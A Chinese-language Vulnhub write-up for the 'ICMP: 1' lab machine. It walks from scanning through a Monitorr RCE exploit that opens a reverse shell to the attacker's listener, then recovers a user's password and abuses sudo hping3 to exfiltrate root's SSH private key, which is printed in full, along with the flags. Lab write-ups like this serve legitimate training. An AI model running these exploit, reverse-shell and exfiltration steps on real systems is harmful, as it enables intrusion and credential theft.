ICMP
作者:jason_huawen
靶机基本信息
名称:ICMP: 1
地址:
https://www.vulnhub.com/entry/icmp-1,633/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.79.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9a:82:57 1 60 PCS Systemtechnik GmbH
192.168.56.216 08:00:27:c7:4a:d1 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.216
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.216 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 02:40 EST
Nmap scan report for localhost (192.168.56.216)
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
| 256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_ 256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:C7:4A:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds
NMAP扫描结果表明目标主机有2个开放端口22(SSH)、80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub]
└─$ curl http://192.168.56.216
用Curl命令访问目标主机的80端口,没有返回内容。但是用浏览器访问80端口,会被自动重定向到http://192.168.56.216/mon
┌──(kali㉿kali)-[~/Vulnhub]
└─$ nikto -h http://192.168.56.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.216
+ Target Hostname: 192.168.56.216
+ Target Port: 80
+ Start Time: 2022-11-24 02:47:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /mon
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2022-11-24 02:48:38 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/24 02:48:54 Starting gobuster in directory enumeration mode
===============================================================
/mon (Status: 301) [Size: 314] [--> http://192.168.56.216/mon/]
/server-status (Status: 403) [Size: 279]
Progress: 220102 / 220561 (99.79%)===============================================================
2022/11/24 02:49:23 Finished
===============================================================
用nikto和gobuster工具没有扫描出新的目录。
不过从返回的页面内容可以知道CMS的类型和版本 Monitorr 1.7.6m,利用searchsploit查询,竟然有相应的远程执行漏洞:
┌──(kali㉿kali)-[~/Vulnhub]
└─$ searchsploit Monitorr
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) | php/webapps/48980.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ searchsploit -m php/webapps/48980.py
Exploit: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
URL: https://www.exploit-db.com/exploits/48980
Path: /usr/share/exploitdb/exploits/php/webapps/48980.py
File Type: Python script, ASCII text executable, with very long lines (434)
Copied to: /home/kali/Vulnhub/ICMP/48980.py
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ ls
48980.py nmap_full_scan
将漏洞利用代码拷贝到工作目录,执行该代码,在Kali linux上成功得到目标主机反弹回来的shell:
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ python 48980.py http://192.168.56.216/mon 192.168.56.206 5555
A shell script should be uploaded. Now we try to execute it
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.216] 37470
bash: cannot set terminal process group (536): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@icmp:/var/www/html/mon/assets/data/usrimg$
www-data@icmp:/home/fox$ ls -alh
ls -alh
total 20K
drwxr-xr-x 3 root root 4.0K Dec 3 2020 .
drwxr-xr-x 3 root root 4.0K Dec 3 2020 ..
lrwxrwxrwx 1 root root 9 Dec 3 2020 .bash_history -> /dev/null
drwx--x--x 2 fox fox 4.0K Dec 3 2020 devel
-rw-r--r-- 1 fox fox 33 Dec 3 2020 local.txt
-rw-r--r-- 1 root root 78 Dec 3 2020 reminder
www-data@icmp:/home/fox$ cat local.txt
cat local.txt
c9db6c88939a2ae091c431a45fb1e59c
www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?
www-data@icmp:/home/fox$ cd devel
cd devel
www-data@icmp:/home/fox/devel$ ls -alh
ls -alh
ls: cannot open directory '.': Permission denied
www-data@icmp:/home/fox/devel$ cd ..
cd ..
www-data@icmp:/home/fox$
www-data@icmp:/home/fox$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: no tty present and no askpass program specified
www-data@icmp:/home/fox$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@icmp:/home/fox$
提权
试了很久,找各种漏洞 或者配置都没成功,而且一直觉得作者给出reminder这个提示肯定是有用的,开始是认为crypt.php在某个目录,其实是在/devel目录下,虽然没有进入/devel目录的权限,但是基于作者的提示,可以查看crypt.php的内容:
www-data@icmp:/home/fox$ ls -alh devel/crypt.php
ls -alh devel/crypt.php
-rw-r--r-- 1 fox fox 56 Dec 3 2020 devel/crypt.php
www-data@icmp:/home/fox$ ls -alh devel
ls -alh devel
ls: cannot open directory 'devel': Permission denied
www-data@icmp:/home/fox$ ls -alhd devel
ls -alhd devel
drwx--x--x 2 fox fox 4.0K Dec 3 2020 devel
www-data@icmp:/home/fox$
这样就拿到了fox的密码!
www-data@icmp:/home/fox$ su - fox
su - fox
Password: BUHNIJMONIBUVCYTTYVGBUHJNI
id
uid=1000(fox) gid=1000(fox) groups=1000(fox)
which python
/usr/bin/python
python -c 'import -c pty;pty.spawn("/bin/bash")'
File "<string>", line 1
import -c pty;pty.spawn("/bin/bash")
^
SyntaxError: invalid syntax
python -c 'import pty;pty.spawn("/bin/bash")'
fox@icmp:~$ ls
ls
devel local.txt reminder
fox@icmp:~$ cd devel
cd devel
fox@icmp:~/devel$ ls -alh
ls -alh
total 12K
drwx--x--x 2 fox fox 4.0K Dec 3 2020 .
drwxr-xr-x 3 root root 4.0K Dec 3 2020 ..
-rw-r--r-- 1 fox fox 56 Dec 3 2020 crypt.php
fox@icmp:~/devel$ sudo -l
sudo -l
[sudo] password for fox: BUHNIJMONIBUVCYTTYVGBUHJNI
Matching Defaults entries for fox on icmp:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fox may run the following commands on icmp:
(root) /usr/sbin/hping3 --icmp *
(root) /usr/bin/killall hping3
fox@icmp:~/devel$
直接执行hping3命令无法成功,因为必须是icmp模式,但是可以通过这个命令读取文件,比如root用户的私钥
开启两个终端,一个启用listen模式,另一个启用发包模式,发包模式下读取/root/.ssh/id_rsa文件
fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe
Warning: Unable to guess the output interface
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
$ sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa
HPING 127.0.0.1 (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip=127.0.0.1 ttl=64 id=47727 icmp_seq=0 rtt=5.6 ms
len=128 ip=127.0.0.1 ttl=64 id=47896 icmp_seq=1 rtt=4.9 ms
len=128 ip=127.0.0.1 ttl=64 id=47903 icmp_seq=2 rtt=5.5 ms
len=128 ip=127.0.0.1 ttl=64 id=47938 icmp_seq=3 rtt=4.2 ms
len=128 ip=127.0.0.1 ttl=64 id=48082 icmp_seq=4 rtt=4.1 ms
len=128 ip=127.0.0.1 ttl=64 id=48244 icmp_seq=5 rtt=3.7 ms
len=128 ip=127.0.0.1 ttl=64 id=48407 icmp_seq=6 rtt=3.5 ms
len=128 ip=127.0.0.1 ttl=64 id=48646 icmp_seq=7 rtt=3.7 ms
len=128 ip=127.0.0.1 ttl=64 id=48792 icmp_seq=8 rtt=3.4 ms
len=128 ip=127.0.0.1 ttl=64 id=49003 icmp_seq=9 rtt=3.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49225 icmp_seq=10 rtt=2.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49238 icmp_seq=11 rtt=1.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49484 icmp_seq=12 rtt=1.4 ms
len=128 ip=127.0.0.1 ttl=64 id=49529 icmp_seq=13 rtt=7.9 ms
len=128 ip=127.0.0.1 ttl=64 id=49592 icmp_seq=14 rtt=7.3 ms
可能需要定义-d 即数据的大小,否则接收不到
这样我们就读取了root用户的私钥,在kali linux本地建立文件(以上面通过hping3输出的内容作为私钥)
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ >....
LaXVQLTnGH4UerV7LqCnzwg/B9Df9FxClQB2kBlpC/xABkKj7qhjExi7+tspS/G6VXXgGq
JemiXcQE92oJcTnLoXYBxQD1R3qIxrSGjZqYj6tHyFmbVd4CYkkbpuxgRlEfmloTemRJ5+
1rjrjo4m7VCzWnZyBMjz+8aZRHKB1nng7zNOtDLS8daI7/HoNt2wL3f6abMlIjsNvwCRne
R50R/chWQl8yfm4GuqFdkh/eQf6XwXNLCg+SJ/6+AhVvjU1B+Wd4l9nUGXaEJyomYyiuGg
LC3Iy191cwDa+1jukS2p8QH3y9MRcQAAAAMBAAEAAAGAAiBk4NqLn0idBZCFwL1X8D2jHH
HoJqMVou7Qq4FS4HtA9En1WIq32s3NxrIFp8xQrw8yfVioiRb+EXYlZxxrMdEqTg2OqWDH
xmqTfazViIZWI4Wpe2yrGxX3WUEY098zP3LDIFzYZiPPX1HasqZmHwaVMal9HxAyUvmTCZ
oP1cnRMwhjsDbp0TttpXw5W4UB0icPWoCjG9f0onAyeFGwz9uH0gAyDFct08eeXHKByCoZ
XcEeewMC4G0Y5vrQwZFEJcEP7+FES0RHCT8itoeC51t4HOtHLX5BKcApf8cAp3LK8alEl3
lJfLklX2Rm8v9l4RjWxxAgFpmY5o4PeXLeKP6/35VewAmMwNiZ17J/MOUMsj/2SCNxYh7Z
LmIIL9B65ipd/L7RXSbFhpGbT6jyOYzDI8D6VGwCEhMiVITntyh5YvimgZTzlP3zmTsxX5
lmyAn/RIJ6tXnXIkmGw1QjHfS0eI5ny+vR8SlmDnTlF1LFk65+qY42sWWeVweP4tkxAAAA
wDvG1aNPq532hZw+P5NzrocyRSu4GfmygSpZY13OTtKGPDjQMPwABPYFOYS/cul0i9mpS1
SeBllnDJbEwM3/iH6k/YlEuT7tIKeRbx/8MTAjkCO0sBWyA4k3tFbupsZu2/jWOxrcUgeH
1833FdCX/EyAzBDirDopqYmR77SDERqOYLbwgv6r2J6rj4FboRemx2T1XRo+DJOczlU0yJ
vTKQRbCFe3+Z5ZYkMg3SCvMsbu1vj+f9pu0uG84s3R3FFGYAAAAMEA0aLIF8pXABXUD+60
bIXpizYMoodJHl02C17wBjMWVzEYah6Vq+ZvoOvqMISkeIIhDUf8jwgaFVYkv/Nr33qmSN
FsEms4d8vJ9c8MFWykmxvmSwVh26G0DQxlASZ3exgyqmnCl9LSGwY0W4brH6nOrKRBKDTH
xeMBxuxNdkfU6ABy5NbrSmMnQP/bLozC1GJlyB4TAvvK/PH29L8ncSzsx9KimV4eM3fv1j
5x+VwcOnMnbzg8F1RrA5O6xJfYMnQVAAAAwQDPS88AHHxqwqg2LocOLQ6AVyqDB6IRDiDV
mI4KG5dALS8EnHGmObVhx6qiwi09X666eDen2G/W1bVc8X9lyJVVtKEdOhLrizkPAqY3wW
9V/kC7S2DX0aDYpVyZTSpeV63SPHCrN1jryAQMMgz+CswS7/sIqEUAPNqMAxzoziR3WBIG
qEx5FmhFueiELGZjVJiEPAWbbsFRdskr4eYfhJ+bz91G5aJXpIJqsNw829TOXf/3439Rix
q/qSihL6WLsu0AAAAQcm9vdEBjYWxpcGVuZHVsYQECAw==
-----END OPENSSH PRIVATE KEY-----" > isa_id
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ cat isa_id
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqcCz/pKzjVNZi9zdKJDkvhMhY8lOb2Qth8e/3bLJ/ssgmRLoJXAQ
sGF3lKw7MFJ4Kl6mrbod2w8EMfULTjW6OhwZ8txdNmTDkbof4irIm93oQgrqMy8/2GwF/k
Sf84k8Yem6gRUhDDnYcKLF2Q2mBJW9WRSDImYVkZX8n/30GrUpHN7cVGCsKsuTxfZI4n3E
fj90y0zlpUgtpdVAtOcYfhR6tXsuoKfPCD8H0N/0XEKVAHaQGWkL/EAGQqPuqGMTGLv62y
lL8bpVdeAaol6aJdxAT3aglxOcuhdgHFAPVHeojGtIaNmpiPq0fIWZtV3gJiSRum7GBGUR
+aWhN6ZEnn7WuOuOjibtULNadnIEyPP7xplEcoHWeeDvM060MtLx1ojv8eg23bAvd/ppsy
UiOw2/AJGd5HnRH9yFZCXzJ+bga6oV2SH95B/pfBc0sKD5In/r4CFW+NTUH5Z3iX2dQZdo
QnKiZjKK4aAsLcjLX3VzANr7WO6RLanxAffL0xFxAAAFiEC+3VBAvt1QAAAAB3NzaC1yc2
EAAAGBAKnAs/6Ss41TWYvc3SiQ5L4TIWPJTm9kLYfHv92yyf7LIJkS6CVwELBhd5SsOzBS
eCpepq26HdsPBDH1C041ujocGfLcXTZkw5G6H+IqyJvd6EIK6jMvP9hsBf5En/OJPGHpuo
EVIQw52HCixdkNpgSVvVkUgyJmFZGV/J/99Bq1KRze3FRgrCrLk8X2SOJ9xH4/dMtM5aVI
LaXVQLTnGH4UerV7LqCnzwg/B9Df9FxClQB2kBlpC/xABkKj7qhjExi7+tspS/G6VXXgGq
JemiXcQE92oJcTnLoXYBxQD1R3qIxrSGjZqYj6tHyFmbVd4CYkkbpuxgRlEfmloTemRJ5+
1rjrjo4m7VCzWnZyBMjz+8aZRHKB1nng7zNOtDLS8daI7/HoNt2wL3f6abMlIjsNvwCRne
R50R/chWQl8yfm4GuqFdkh/eQf6XwXNLCg+SJ/6+AhVvjU1B+Wd4l9nUGXaEJyomYyiuGg
LC3Iy191cwDa+1jukS2p8QH3y9MRcQAAAAMBAAEAAAGAAiBk4NqLn0idBZCFwL1X8D2jHH
HoJqMVou7Qq4FS4HtA9En1WIq32s3NxrIFp8xQrw8yfVioiRb+EXYlZxxrMdEqTg2OqWDH
xmqTfazViIZWI4Wpe2yrGxX3WUEY098zP3LDIFzYZiPPX1HasqZmHwaVMal9HxAyUvmTCZ
oP1cnRMwhjsDbp0TttpXw5W4UB0icPWoCjG9f0onAyeFGwz9uH0gAyDFct08eeXHKByCoZ
XcEeewMC4G0Y5vrQwZFEJcEP7+FES0RHCT8itoeC51t4HOtHLX5BKcApf8cAp3LK8alEl3
lJfLklX2Rm8v9l4RjWxxAgFpmY5o4PeXLeKP6/35VewAmMwNiZ17J/MOUMsj/2SCNxYh7Z
LmIIL9B65ipd/L7RXSbFhpGbT6jyOYzDI8D6VGwCEhMiVITntyh5YvimgZTzlP3zmTsxX5
lmyAn/RIJ6tXnXIkmGw1QjHfS0eI5ny+vR8SlmDnTlF1LFk65+qY42sWWeVweP4tkxAAAA
wDvG1aNPq532hZw+P5NzrocyRSu4GfmygSpZY13OTtKGPDjQMPwABPYFOYS/cul0i9mpS1
SeBllnDJbEwM3/iH6k/YlEuT7tIKeRbx/8MTAjkCO0sBWyA4k3tFbupsZu2/jWOxrcUgeH
1833FdCX/EyAzBDirDopqYmR77SDERqOYLbwgv6r2J6rj4FboRemx2T1XRo+DJOczlU0yJ
vTKQRbCFe3+Z5ZYkMg3SCvMsbu1vj+f9pu0uG84s3R3FFGYAAAAMEA0aLIF8pXABXUD+60
bIXpizYMoodJHl02C17wBjMWVzEYah6Vq+ZvoOvqMISkeIIhDUf8jwgaFVYkv/Nr33qmSN
FsEms4d8vJ9c8MFWykmxvmSwVh26G0DQxlASZ3exgyqmnCl9LSGwY0W4brH6nOrKRBKDTH
xeMBxuxNdkfU6ABy5NbrSmMnQP/bLozC1GJlyB4TAvvK/PH29L8ncSzsx9KimV4eM3fv1j
5x+VwcOnMnbzg8F1RrA5O6xJfYMnQVAAAAwQDPS88AHHxqwqg2LocOLQ6AVyqDB6IRDiDV
mI4KG5dALS8EnHGmObVhx6qiwi09X666eDen2G/W1bVc8X9lyJVVtKEdOhLrizkPAqY3wW
9V/kC7S2DX0aDYpVyZTSpeV63SPHCrN1jryAQMMgz+CswS7/sIqEUAPNqMAxzoziR3WBIG
qEx5FmhFueiELGZjVJiEPAWbbsFRdskr4eYfhJ+bz91G5aJXpIJqsNw829TOXf/3439Rix
q/qSihL6WLsu0AAAAQcm9vdEBjYWxpcGVuZHVsYQECAw==
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ chmod 400 isa_id
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ ssh -i isa_id [email protected]
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@icmp:~# id
uid=0(root) gid=0(root) groups=0(root)
root@icmp:~# cd /root
root@icmp:~# ls
proof.txt
root@icmp:~# cat proof.txt
9377e773846aeabb51b37155e15cf638
root@icmp:~#
成功提权!
标签:icmp,kali,fox,Vulnhub,靶机,ICMP,root,id,usr From: https://www.cnblogs.com/jason-huawen/p/16922727.html